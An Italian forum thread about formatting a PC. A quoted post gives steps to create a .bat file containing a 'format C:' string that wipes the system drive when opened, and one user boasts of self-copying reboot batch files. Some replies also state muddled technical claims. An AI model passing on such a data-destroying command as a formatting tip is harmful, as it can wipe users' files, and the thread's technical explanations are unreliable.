Formattare un computer

(l'ho saputo da poco ed è molto semplice)

« Older   Newer »
 
  Share  
.
  1. SUPREMO KING™
        Like  
     
    .

    User deleted


    CITAZIONE (gon90 @ 29/11/2007, 14:48)
    CITAZIONE (SUPREMO KING™ @ 29/11/2007, 14:37)
    Io avevo risposto a questo topic ma qualcuno mi deve aver cancellato il post.bah..comunque ripeto....quella non è un modalità DOC per formattare il pc ,in quel modo che tu spieghi non fai altro che generare una specie di virus (sarebbe meglio dire un errore irreversibile) che intacca il registro...quindi io lo sconsiglierei...

    .........................azzzzzzzzzzzzzzzzzzzzz...........

    Vabbe il mio parere è solo formale dato che oggi usano tutti questi trucchettini x formattare un pc ;)
     
    .
  2.     Like  
     
    .
    Avatar

    Hardcore Gamer

    Group
    Member
    Posts
    5,712
    Reputation
    0
    Location
    Sicilia

    Status
    Offline
    ragazzi io volevo sapere una cosa:
    ho un portatile ACER con due hard disk.
    in uno c'è windows xp (cioè nel C) nell'altro c'è windows vista (cioè il D) ma io ora voglio formattre il D
    come faccio ???? rispondetemi per favore mi serve al + presto
     
    .
  3. gon90
        Like  
     
    .

    User deleted


    io una risposta certa non te la sò dare ma penso che basti iserire il cd di vista no???????????
    aspetta la risposta di un admin o un mod loro te la sapranno dare con certezza
     
    .
  4.     Like  
     
    .
    Avatar

    Hardcore Gamer

    Group
    Member
    Posts
    2,779
    Reputation
    0
    Location
    me casa..

    Status
    Offline
    CITAZIONE (Beckham-23 @ 18/12/2007, 15:53)
    ragazzi io volevo sapere una cosa:
    ho un portatile ACER con due hard disk.
    in uno c'è windows xp (cioè nel C) nell'altro c'è windows vista (cioè il D) ma io ora voglio formattre il D
    come faccio ???? rispondetemi per favore mi serve al + presto

    allora prima cosa bisognerebbe verificare se sono 2 hard disk o 1 unico con 2 partizioni...

    comunque vuoi togliere vista giusto?

    basterebbe che da XP col click destro sul disco D: scegli formatta....ma non so se te lo lascia fare dato che se si tratta di doppia partizione forse ti blocca.....

    per andare sul sicuro fai così:
    - pannello di controllo
    - strumenti di amministrazione
    - gestione computer
    In gestione dovresti trovare una specie di risorse del compute (per farla semplice) con una cartella "archiviazione" ed una sottocartella "gestione disco"

    Li dentro vedi i tuoi dischi C e D e dovresti vedere se è un disco unico oppure 2 partizioni....

    Prova a controllare...eventualmente se è una partizione puoi formattarla da lì...
     
    .
  5. Radask
        Like  
     
    .

    User deleted


    CITAZIONE (†VYPER† @ 13/11/2007, 22:23)
    questa cosa l'ho saputa da poco e ve la posto ma non usatela per scopi meschini,solo se dovete formattare un computer non sono nemmeno sicuro se posso postarla comunque se non posso vi prego non bannatemi!!!!

    .::Formattare un computer::.



    1)Create un nuovo file blocco note e apritelo
    2)digitate la seguente stringa all'inizio del file: !|!@format C:autotest.!|!
    3)salvate.
    4)rinominate il file cambiandogli l'estensione da .txt a .bat .
    ATTENZIONE!!!! SE IL FILE ADESSO VIENE APERTO FORMATTA IL DISCO C SENZA LASCIARE SCAMPO!!!!!

    mi raccomando attenzione!
    (spero possa servire a qualcuno...)



    SPOILER (click to view)
    [mi sono appena accorto che ho sbagliato a scrivere il titolo potete correggere perfavore?]

    pero' con questo metodo si cancellano tutti i file dal pc e bisogna installare di nuovo il sitema operativo giusto?
     
    .
  6. the be$t
        Like  
     
    .

    User deleted


    CITAZIONE (Radask @ 16/6/2008, 18:17)
    pero' con questo metodo si cancellano tutti i file dal pc e bisogna installare di nuovo il sitema operativo giusto?

    Ovvio, con la formattazione si intendende proprio quello, quindi si perde ogni dato e anche il sistema operativo.
     
    .
  7. Marduk
        Like  
     
    .

    User deleted


    Assolutamente no.
    Formattazione e Cancellazione sono cose diverse infatti la cancellazione di tutto il disco locale C, signifa che quando lo vai a riaccendere non trovi manco windows ma solo il dos che si trova nella scheda madre invece la formattazione windows lo lascia a meno che non si venga specificato ;)

    si conosco bene il batch e mi posso reputare anche un hacker pesante come dice giustamente Supremo king sono veri e propri virus questi creati in batch(linguaggio programmazione DOS)
    uno dei tanti creati da me è quello per esempio che il computer si riavvia ogni 1 secondo(ma può variare) ma la fregatura e che lo faccio andare a copiare in esecuzione automatica
     
    .
  8. SUPREMO KING™
        Like  
     
    .

    User deleted


    CITAZIONE (Marduk @ 15/11/2008, 13:13)
    si conosco bene il batch e mi posso reputare anche un hacker pesante

    Il fatto che tu abbia detto di essere un hacker, dimostra che non lo sei.
    Gli hacker non vanno in giro a dire di esserlo e "lavorano" dietro le quinte,senza che nessuno li scovi.
    Non hanno alcun interesse a far vedere che son bravi con i codici...
    Ciò non lo dico per giustificare cio che fanno ma per giustificare la mia prima affermazione.....

    Comunque ti posso dire che secondo me, questo codice che tu dici aver creato è davvero inutile e pericoloso.
     
    .
  9. 360Genius™
        Like  
     
    .

    User deleted


    neanche io lo sapevo...
    grazie!

    neanche io lo sapevo...
    grazie!

    però mi sa che è sconsigliato, potrebbe esserci qualche virus!!!!
     
    .
23 replies since 13/11/2007, 21:23   7516 views
  Share  
.